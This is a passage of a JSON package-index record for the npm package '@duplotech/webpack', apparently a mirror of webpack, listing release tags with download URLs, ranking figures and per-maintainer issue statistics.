t":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-09-01T02:40:24.509Z","dependent_packages_count":1,"downloads":9,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":43.5886015547087,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08412454391301193,"forks_count":0.5276340879249939,"average":17.15045734617065},"purl":"pkg:npm/%40duplotech/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@duplotech/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@duplotech/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@duplotech/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T19:17:33.706Z","issues_count":10170,"pull_requests_count":9468,"avg_time_to_close_issue":10847458.413030302,"avg_time_to_close_pull_request":2764488.9421997755,"issues_closed_count":9900,"pull_requests_closed_count":8910,"pull_request_authors_count":1445,"issue_authors_count":6691,"avg_comments_per_issue":5.832251720747296,"avg_comments_per_pull_request":3.1891634980988592,"merged_pull_requests_count":6045,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":85,"past_year_pull_requests_count":955,"past_year_avg_time_to_close_issue":839618.0847457628,"past_year_avg_time_to_close_pull_request":356132.6119205298,"past_year_issues_closed_count":59,"past_year_pull_requests_closed_count":755,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":67,"past_year_avg_comments_per_issue":3.2823529411764705,"past_year_avg_comments_per_pull_request":4.964397905759163,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":141,"past_year_merged_pull_requests_count":601,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":130,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":452,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v